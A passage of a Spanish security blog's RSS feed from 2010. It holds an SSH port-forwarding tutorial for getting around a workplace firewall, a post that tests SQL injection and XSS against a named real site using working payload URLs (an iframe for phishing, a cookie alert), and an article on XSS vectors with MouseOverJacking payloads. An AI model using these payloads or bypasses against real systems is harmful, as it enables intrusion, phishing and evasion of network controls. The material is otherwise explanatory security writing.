href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fasaltando-un-sitio-de-series-online%2F&amp;linkname=Asaltando%20un%20sitio%20de%20series%20online" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fasaltando-un-sitio-de-series-online%2F&amp;linkname=Asaltando%20un%20sitio%20de%20series%20online" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fasaltando-un-sitio-de-series-online%2F&amp;linkname=Asaltando%20un%20sitio%20de%20series%20online">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/asaltando-un-sitio-de-series-online/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
<enclosure url="http://efectoanime.com/server/dn0te/06.mp4" length="46993332" type="video/mp4" />
<enclosure url="http://efectoanime.com/server/hades/h29.mp4" length="55590277" type="video/mp4" />
<enclosure url="http://efectoanime.com/server/hades/h30.mp4" length="55734802" type="video/mp4" />
<enclosure url="http://efectoanime.com/server/hades/h31.mp4" length="55676125" type="video/mp4" />
<enclosure url="http://efectoanime.com/server/thundercats/Th71.mp4" length="49280711" type="video/mp4" />
<enclosure url="http://efectoanime.com/server/thundercats/Th72.mp4" length="49235801" type="video/mp4" />
<enclosure url="http://efectoanime.com/server/thundercats/Th73.mp4" length="49207779" type="video/mp4" />
<enclosure url="http://efectoanime.com/server/thundercats/Th74.mp4" length="49227983" type="video/mp4" />
<enclosure url="http://efectoanime.com/server/shippuden/Shippuden_144.mp4" length="41486718" type="video/mp4" />
<enclosure url="http://efectoanime.com/server/bl34ch/B255.mp4" length="53645980" type="video/mp4" />
<enclosure url="http://efectoanime.com/server/shippuden/Shippuden_145.mp4" length="63605490" type="video/mp4" />
<enclosure url="http://efectoanime.com/server/bl34ch/B256.mp4" length="36685761" type="video/mp4" />
<enclosure url="http://efectoanime.com/server/shippuden/Shippuden_146.mp4" length="39210296" type="video/mp4" />
<enclosure url="http://efectoanime.com/server/thundercats/Th90.mp4" length="37847843" type="video/mp4" />
<enclosure url="http://efectoanime.com/server/thundercats/Th92.mp4" length="37878330" type="video/mp4" />
		</item>
		<item>
		<title>SSH, Port Forwarding y Tunneling: Saltarse las restricciones del firewall</title>
		<link>http://blog.zerial.org/seguridad/ssh-port-forwarding-y-tunneling-saltarse-las-restricciones-del-firewall/</link>
		<comments>http://blog.zerial.org/seguridad/ssh-port-forwarding-y-tunneling-saltarse-las-restricciones-del-firewall/#comments</comments>
		<pubDate>Sat, 06 Feb 2010 19:59:04 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Documentacion]]></category>
		<category><![CDATA[GNU/Linux]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[bypass]]></category>
		<category><![CDATA[firewall]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[port forwarding]]></category>
		<category><![CDATA[redes]]></category>
		<category><![CDATA[ssh]]></category>
		<category><![CDATA[tunneling]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1502</guid>
		<description><![CDATA[En mi nuevo lugar de trabajo, misteriosamente está bloqueado por el firewall, entre otras cosas, la salida al puerto 25 de cualquier servidor. Desde mi portatil uso el cliente de correo Thunderbird conectandose a distintas cuentas  de correo que tengo alojadas en Google Apps asi que no podía quedarme sin revisar mis cuentas de correo, [...]]]></description>
			<content:encoded><![CDATA[<p>En mi nuevo lugar de trabajo, misteriosamente está bloqueado por el firewall, entre otras cosas, la salida al puerto 25 de cualquier servidor. Desde mi portatil uso el cliente de correo Thunderbird conectandose a distintas cuentas  de correo que tengo alojadas en Google Apps asi que no podía quedarme sin revisar mis cuentas de correo, por lo que tuve que buscar la forma de hacerlo.<br />
<a href="http://blog.zerial.org/wp-content/uploads/2010/02/firwall.png"><img class="alignleft size-medium wp-image-1503" title="firwall" src="http://blog.zerial.org/wp-content/uploads/2010/02/firwall-300x167.png" alt="" width="250" height="139" /></a>Lo primero que se me vino a la cabeza es hacer un port forwarding con ssh usando un servidor externo, sabiendo que tengo el puerto 22 desbloqueado para salir. Entonces, accedería a cualquier servicio corriendo en el puerto 25 mediante un redireccionamiento a traves del puerto 22. Con esta técnica podemos saltarons el firewall y todas las restricciones.</p>
<p><span id="more-1502"></span></p>
<p>El port forwarding, según el mismo manual de ssh, corresponde a:</p>
<blockquote><p>Specifies that the given port on the local (client) host is to be<br />
forwarded to the given host and port on the remote side.  This<br />
works by allocating a socket to listen to port on the local side,<br />
optionally bound to the specified bind_address.  Whenever a con-<br />
nection is made to this port, the connection is forwarded over<br />
the secure channel, and a connection is made to host port<br />
hostport from the remote machine.	Port forwardings can also be<br />
specified in the configuration file.  IPv6 addresses can be spec-<br />
ified with an alternative syntax:<br />
[bind_address/]port/host/hostport or by enclosing the address in<br />
square brackets.  Only the superuser can forward privileged<br />
ports.  By default, the local port is bound in accordance with<br />
the GatewayPorts setting.	However, an explicit bind_address may<br />
be used to bind the connection to a specific address.  The<br />
bind_address of &#8220;localhost&#8221; indicates that the listening port<br />
be bound for local use only, while an empty address or &#8216;*&#8217; indi-<br />
cates that the port should be available from all interfaces.</p></blockquote>
<p>En simples palabras, lo que se hace, es habilitar un puerto local, por el cual se hara un redireccionamiento, a traves de ssh y el servidor remoto, hacia nuestro destino.</p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/02/SSH-Portforwarding.png"><img class="aligncenter size-full wp-image-1507" title="SSH-Portforwarding" src="http://blog.zerial.org/wp-content/uploads/2010/02/SSH-Portforwarding.png" alt="" width="628" height="472" /></a></p>
<h2>Paso a paso</h2>
<p>Mapear la dirección de destino a nuestor localhost, en mi caso (y como ejemplo) usaré <strong>smtp.gmail.com</strong>. Debemos editar el <em>/etc/hosts</em> y agregar a la línea de 127.0.0.1 nuestro destino:<br />
<code>127.0.0.1		localhost.localdomain	localhost smtp.gmail.com</code><br />
Verificamos:<br />
<code> $ ping -c1 smtp.gmail.com<br />
PING localhost.localdomain (127.0.0.1) 56(84) bytes of data.<br />
64 bytes from localhost.localdomain (127.0.0.1): icmp_seq=1 ttl=64 time=0.038 ms</code><br />
Ahora, para nuestro sistema, el host smtp.gmail.com está apuntando a nuestra misma máquina.</p>
<p>Ahora, hacemos el port forwading usando el parámetro <strong>-L</strong> de la siguiente forma:<br />
<code># ssh -L25:smtp.gmail.com:25 zerial@mydomain.org</code></p>
<p>Una véz logeados, ya va a estar hecho el redireccionamiento de puerto. Lo que hacemos con esa linea es decirle que todo el trafico desde <strong>localhost:25</strong> lo lleve a traves de <strong>mydomain.org:22</strong> a nuestro destino <strong>smtp.gmail.com:25</strong>.</p>
<p>Ahora realizamos la prueba, para ver si realmente tenemos salida a <strong>smtp.gmail.com:25</strong>:<br />
<code>$ telnet localhost 25<br />
Trying 127.0.0.1...<br />
Connected to localhost.<br />
Escape character is '^]'.<br />
220 mx.google.com ESMTP 42sm25383892vws.12</code></p>
<p>Listo. Obviamente, el Firewall no podrá bloquear el tráfico de <em>localhost</em> y tampoco el de ssh, ya que va <strong>cifrado</strong>.</p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fssh-port-forwarding-y-tunneling-saltarse-las-restricciones-del-firewall%2F&amp;linkname=SSH%2C%20Port%20Forwarding%20y%20Tunneling%3A%20Saltarse%20las%20restricciones%20del%20firewall" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fssh-port-forwarding-y-tunneling-saltarse-las-restricciones-del-firewall%2F&amp;linkname=SSH%2C%20Port%20Forwarding%20y%20Tunneling%3A%20Saltarse%20las%20restricciones%20del%20firewall" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fssh-port-forwarding-y-tunneling-saltarse-las-restricciones-del-firewall%2F&amp;linkname=SSH%2C%20Port%20Forwarding%20y%20Tunneling%3A%20Saltarse%20las%20restricciones%20del%20firewall" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fssh-port-forwarding-y-tunneling-saltarse-las-restricciones-del-firewall%2F&amp;linkname=SSH%2C%20Port%20Forwarding%20y%20Tunneling%3A%20Saltarse%20las%20restricciones%20del%20firewall" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fssh-port-forwarding-y-tunneling-saltarse-las-restricciones-del-firewall%2F&amp;linkname=SSH%2C%20Port%20Forwarding%20y%20Tunneling%3A%20Saltarse%20las%20restricciones%20del%20firewall" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fssh-port-forwarding-y-tunneling-saltarse-las-restricciones-del-firewall%2F&amp;linkname=SSH%2C%20Port%20Forwarding%20y%20Tunneling%3A%20Saltarse%20las%20restricciones%20del%20firewall" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fssh-port-forwarding-y-tunneling-saltarse-las-restricciones-del-firewall%2F&amp;linkname=SSH%2C%20Port%20Forwarding%20y%20Tunneling%3A%20Saltarse%20las%20restricciones%20del%20firewall" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fssh-port-forwarding-y-tunneling-saltarse-las-restricciones-del-firewall%2F&amp;linkname=SSH%2C%20Port%20Forwarding%20y%20Tunneling%3A%20Saltarse%20las%20restricciones%20del%20firewall">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/ssh-port-forwarding-y-tunneling-saltarse-las-restricciones-del-firewall/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Explotar XSS mediante SQL Injection</title>
		<link>http://blog.zerial.org/seguridad/explotar-xss-mediante-sql-injection/</link>
		<comments>http://blog.zerial.org/seguridad/explotar-xss-mediante-sql-injection/#comments</comments>
		<pubDate>Sat, 30 Jan 2010 19:39:53 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Sitios Vulnerables]]></category>
		<category><![CDATA[cross-site scripting]]></category>
		<category><![CDATA[sitios vulnerables]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[sqli]]></category>
		<category><![CDATA[vulnerabilidad]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1479</guid>
		<description><![CDATA[Para complementar un poco lo que publicó d3m4s1@d0v1v0 en ITFreekZone sobre el Reflected XSS mediante SQL Injection, me gustaría demostrarles otra manera de realizar Cross-Site Scripting aprovechandose de una vulnerabilidad de inyección SQL. La teoría es muy sencilla, basta con que encontremos un sitio vulnerable a inyección SQL, no importa que tenga protecciónes contra comillas [...]]]></description>
			<content:encoded><![CDATA[<p>Para complementar un poco lo que publicó <em>d3m4s1@d0v1v0</em> en <a href="http://itfreekzone.blogspot.com/2010/01/reflected-xss-traves-de-sql-injection.html" target="_blank">ITFreekZone sobre el Reflected XSS mediante SQL Injection</a>, me gustaría demostrarles otra manera de realizar <em>Cross-Site Scripting</em> aprovechandose de una vulnerabilidad de inyección SQL.<br />
La teoría es muy sencilla, basta con que encontremos un sitio vulnerable a inyección SQL, no importa que tenga protecciónes contra comillas simples o dobles, o similar, basta con que podamos generar un error por lado del servidor por ejemplo cambiando un número (id) por una letra (en el caso de oracle, sql server u otros que tengan problemas de compatibilidad por el tipo de dato pasado), agregas signos raros o una comilla obligando a que el servidor arroje un error de sintáxis, lo que vamos a hacer es <strong>insertar código javascript justo donde se genera el error sql</strong>.</p>
<p><span id="more-1479"></span></p>
<p>Ahora vamos a la práctica, se los enseñaré mediante un ejemplo real buscando un sitio web al azar con la ayuda de Google. Encontramos el sitio &#8220;Cibertec.cl&#8221; que al parecer cumple todo para poder explotarla.Ç<br />
Si ingresamos al sitio <strong>http://www.cibertec.cl</strong> y revisamos el tipo de links que contiene, podemos darnos cuenta fácilmente que puede  ser vulnerable a SQLi.</p>
<p style="text-align: center;"><a href="http://blog.zerial.org/wp-content/uploads/2010/01/cibertec_vulnerable.png"><img class="aligncenter size-full wp-image-1494" title="cibertec_vulnerable" src="http://blog.zerial.org/wp-content/uploads/2010/01/cibertec_vulnerable.png" alt="" width="510" height="386" /></a></p>
<p>Vamos a comprobarlo cambiando el número <strong>587</strong> por una comilla simple. Entonces ingresamos a <strong>http://www.cibertec.cl/detalle.php?item=&#8217;</strong> y obtenemos el siguiente mensaje:</p>
<blockquote><p><strong>Database error:</strong> Invalid SQL: SELECT * FROM inventory WHERE id = &#8216;<br />
<strong>MySQL Error</strong>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#8221;&#8217; at line 1)<br />
Session halted.</p></blockquote>
<p>Si nos fijamos en la línea donde nos muestra la consulta SQL podemos ver que al final pone &#8220;<em>WHERE id = &#8216;</em>&#8220;. Pues esa comilla simple que se ve depsues del signo igual es la comilla que nosotros pusimos en el navegador. De esta misma forma, si agregamos la palabra &#8220;<em>prueba</em>&#8221; luego de la comilla simple, podemos ver el siguiente mensaje:</p>
<blockquote><p><strong>Database error:</strong> Invalid SQL: SELECT * FROM inventory WHERE id = &#8216;prueba<br />
<strong>MySQL Error</strong>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#8221;prueba&#8217; at line 1)<br />
Session halted.</p></blockquote>
<p>Ahi aparece la comilla simple seguida de la palabra prueba, justo lo que nosotros escribimos. Bien, ya manejamos lo que queremos que se muestre, ahora debemos insertar el código malicioso.</p>
<p><strong>Prueba de concepto (PoC)</strong></p>
<p>Vamos a aprovecharnos de ésta vulnerabilidad de SQL Injection para realizar phishing y para intentar robar una credencial mediante XSS.</p>
<ol>
<li><strong>Phishing</strong>: Vamos a añadir un iframe con un sitio especialmente preparado para éste fin. Pueden hacer la prueba incrustando el sitio de Google: <em>http://www.cibertec.cl/detalle.php?item=%27%3Ciframe%20src=http://www.google.cl%3E%3C/iframe%3E<br />
</em> (puede leer más sobre esto en <a href="http://blog.zerial.org/seguridad/haciendo-phishing-explotando-una-vulnerabilidad-xss/" target="_blank">un post que publiqué</a> hace un tiempo)</li>
<li><strong>Robo de credenciales</strong>: El típico aprovechamiento de Cross-Site Scripting usando javascript para redirigir al usuario a un sitio web cuyos parámetros será una cookie. Por ejemplo: <em>http://www.cibertec.cl/detalle.php?item=%27%3Cscript%3Ealert%28this.cookie%29%3C/script%3E</em></li>
</ol>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/01/xssph_cibertec.png"><img class="aligncenter size-full wp-image-1498" title="xssph_cibertec" src="http://blog.zerial.org/wp-content/uploads/2010/01/xssph_cibertec.png" alt="" width="613" height="360" /></a></p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/01/xss_cibertec.png"><img class="aligncenter size-full wp-image-1499" title="xss_cibertec" src="http://blog.zerial.org/wp-content/uploads/2010/01/xss_cibertec.png" alt="" width="622" height="194" /></a></p>
<p>De esta manera podemos afirmar que el sitio web Cibertec.cl es vulnerable a SQL Injection y Cross-Site Scriting.</p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fexplotar-xss-mediante-sql-injection%2F&amp;linkname=Explotar%20XSS%20mediante%20SQL%20Injection" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fexplotar-xss-mediante-sql-injection%2F&amp;linkname=Explotar%20XSS%20mediante%20SQL%20Injection" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fexplotar-xss-mediante-sql-injection%2F&amp;linkname=Explotar%20XSS%20mediante%20SQL%20Injection" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fexplotar-xss-mediante-sql-injection%2F&amp;linkname=Explotar%20XSS%20mediante%20SQL%20Injection" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fexplotar-xss-mediante-sql-injection%2F&amp;linkname=Explotar%20XSS%20mediante%20SQL%20Injection" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fexplotar-xss-mediante-sql-injection%2F&amp;linkname=Explotar%20XSS%20mediante%20SQL%20Injection" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fexplotar-xss-mediante-sql-injection%2F&amp;linkname=Explotar%20XSS%20mediante%20SQL%20Injection" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fexplotar-xss-mediante-sql-injection%2F&amp;linkname=Explotar%20XSS%20mediante%20SQL%20Injection">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/explotar-xss-mediante-sql-injection/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>El futuro de los ataques Cross-Site Scripting (XSS)</title>
		<link>http://blog.zerial.org/seguridad/el-futuro-de-los-ataques-cross-site-scripting-xss/</link>
		<comments>http://blog.zerial.org/seguridad/el-futuro-de-los-ataques-cross-site-scripting-xss/#comments</comments>
		<pubDate>Sat, 30 Jan 2010 13:58:24 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[ataques]]></category>
		<category><![CDATA[cross-site scripting]]></category>
		<category><![CDATA[seguridad web]]></category>
		<category><![CDATA[vulnerabilidades]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1450</guid>
		<description><![CDATA[Los ataques XSS son cada día más frecuentes, pareciera ser que al desarrollador no le interesa o por desconocimiento no sabe a lo que se está exponiendo, pero por otro lado, los desarrolladores de los navegadores si están concientes y desarrollan técnicas anti XSS. La forma más común de realizar un ataque XSS es insertando [...]]]></description>
			<content:encoded><![CDATA[<p>Los ataques XSS son cada día más frecuentes, pareciera ser que al desarrollador no le interesa o por desconocimiento no sabe a lo que se está exponiendo, pero por otro lado, los desarrolladores de los navegadores si están concientes y desarrollan técnicas anti XSS. La forma más común de realizar un ataque XSS es insertando tags cómo parámetor de URL o bien dentro de un campo del formulario, como por ejemplo el conocido:</p>
<blockquote><p>&lt;script&gt;alert(&#8216;this.cookie&#8217;)&lt;/script&gt;</p></blockquote>
<p>Cuando los ataques <strong>XSS</strong> mediante tags no son posibles, existe la posibilidad de realizar el ataque usando las propiedades de cada tag. Puede ser usando el atributo <em>style</em>, <em>src</em> o algúnos gatilladores de eventos como onMouseOver, etc. Para poder realizar el ataque es necesario usar comillas (simples o dobles), aunque tambien en algunos casos existe la posibilidad de no usarlas, para poder agregar una nueva propiedad al tag en el cual hemos conseguido insertar el código.</p>
<p><span id="more-1450"></span></p>
<p>En los ataques realizados mediante la propiedad style, podemos usar las siguientes funciones o métodos (en este caso, el código se ejecuta automáticamente al cargar la página):</p>
<ol>
<li>Usando <strong>expression()</strong>, sólo funciona en Internet Explorer anterior a la versión 8.</li>
<li>Usando <strong>background:url()</strong> o <strong>background-img:url()</strong>, sólo funciona en Internet Explorer.</li>
<li>Usando <strong>-moz-binding:url()</strong>, sólo funciona en Mozila y en otros motores basados en Gecko (antes de Firefox 3).</li>
</ol>
<p>Pueden ver un ejemplo de un ataque usando <strong>-moz-binding:url()</strong> y <strong>expression()</strong> en <a href="http://websecurity.com.ua/2932/" target="_blank">éste</a> link (está en un idioma que seguramente no entenderemos pero los ejemplos se entienden sin problemas).</p>
<p>Los ataques vía eventos (<em>handlers</em>) son aplicables de la siguiente forma:</p>
<ol>
<li>Eventos como <strong>onMouseOver</strong>, <strong>onFocus</strong>, <strong>onBlur</strong>, <strong>onSelect</strong>, <strong>onChange</strong>, <strong>onClick</strong>, etc.</li>
<li>Usando <strong>onError</strong>, <strong>onLoad</strong> y <strong>onUnload</strong>, para ejecutar código automáticamente al cargar o cerrar la página.</li>
</ol>
<p>La posibilidad de usar <strong>onLoad</strong>, <strong>onUnload</strong> y <strong>onError</strong> no es muy amenudo y los otros eventos no se ejecutan automáticamente, siempre hay que esperar a que <em>algo</em> los gatille. Por ésto mismo, este tipo de ataque XSS no es muy popular, generalmente se ataca incrustando código en las propiedades tales como <em>style</em>, ya que se ejecuta automáticamente.<br />
Cerca del 2008, la posibilidad de realizar un ataque XSS mediante <em>-moz-binding</em> fue removida (o bueno, fue parcialmente removida ya que aún es posible realizar ataques de éste tipo mediante ficheros xml en el mismo sitio). En el lanzamiento de Internet Explorer 8, a comienzos del 2009, se removió el soporte a la función o método <strong>expression()</strong>. Tambien fue removido el soporte de javascript o vbscript en background-image.<br />
Con los arreglos que se hicieron en los distintos navegadores,  se dificuló el llevar a cabo  ataques Cross-Site Scripting mediante tags. Por otro lado, los navegadores como Opera y Chrome resisten ataques  de éste tipo mediante la propiedad <em>style</em>.<br />
Podemos usar la técnica del <a href="http://websecurity.com.ua/3814/" target="_blank">MouseOverJacking</a>. Con ésta técnica, se puede automatizar el ataque XSS. Es una solución que funciona en todos los navegadores, incluyendo IE8, eludiendo la protección <em>anti-clickjacking</em> que trae incorporada.<br />
<em>MouseOverJacking</em> se puede usar en lugar de <strong>expression()</strong> y <strong>-moz-binding()</strong>. El ataque está automatizado, por lo que el ataque cumpliría el mismo objetivo que <em>expression</em> y <em>-moz-binding</em> y gracias al soporte multi navegador, es posible atacar a más usuarios.<br />
Se puede realizar con MouseOverJacking lo mismo que con ClickJacking, con la diferencia que el MouseOverJacking es más efectivo, ya que no espera ninguna acción del usuario, no es necesario que el usuario haga click para gatillar el ataque. El ClickJacking espera un click por parte del usuario en cambio el MouseOverJacking simplemente espera el movimiento del ratón.</p>
<p>Ejemplos:</p>
<p><strong>Reflected XSS</strong></p>
<blockquote><p>http://site/script?param=%22%20style=%22width:100%;height:100%;display:block;position:absolute;top:0px;left:0px%22%20onMouseOver=%22alert(document.cookie)%22</p></blockquote>
<p><strong>Persistent XSS</strong></p>
<blockquote><p>&lt;a href=&#8221;#&#8221; style=&#8221;width:100%;height:100%;display:block;position:absolute;top:0px;left:0px&#8221; onMouseOver=&#8221;alert(document.cookie)&#8221;&gt;&amp;nbsp;&lt;/a&gt;</p></blockquote>
<p><em>Este artículo corresponde a una traducción al Español de la <a href="http://websecurity.com.ua/3878/" target="_blank">traducción al Inglés</a> del <a href="http://websecurity.com.ua/3860/" target="_blank">original</a>, extraído de <a href="http://websecurity.com.ua" target="_blank">WebSecurity</a>.</em></p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-futuro-de-los-ataques-cross-site-scripting-xss%2F&amp;linkname=El%20futuro%20de%20los%20ataques%20Cross-Site%20Scripting%20%28XSS%29" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-futuro-de-los-ataques-cross-site-scripting-xss%2F&amp;linkname=El%20futuro%20de%20los%20ataques%20Cross-Site%20Scripting%20%28XSS%29" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-futuro-de-los-ataques-cross-site-scripting-xss%2F&amp;linkname=El%20futuro%20de%20los%20ataques%20Cross-Site%20Scripting%20%28XSS%29" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-futuro-de-los-ataques-cross-site-scripting-xss%2F&amp;linkname=El%20futuro%20de%20los%20ataques%20Cross-Site%20Scripting%20%28XSS%29" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-futuro-de-los-ataques-cross-site-scripting-xss%2F&amp;linkname=El%20futuro%20de%20los%20ataques%20Cross-Site%20Scripting%20%28XSS%29" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-futuro-de-los-ataques-cross-site-scripting-xss%2F&amp;linkname=El%20futuro%20de%20los%20ataques%20Cross-Site%20Scripting%20%28XSS%29" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-futuro-de-los-ataques-cross-site-scripting-xss%2F&amp;linkname=El%20futuro%20de%20los%20ataques%20Cross-Site%20Scripting%20%28XSS%29" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-futuro-de-los-ataques-cross-site-scripting-xss%2F&amp;linkname=El%20futuro%20de%20los%20ataques%20Cross-Site%20Scripting%20%28XSS%29">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/el-futuro-de-los-ataques-cross-site-scripting-xss/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Sitios que no protegen la información (Parte I): Instituto Chacabuco</title>
		<link>http://blog.zerial.org/seguridad/sitios-que-no-protegen-la-informacion-parte-i-instituto-chacabuco/</link>
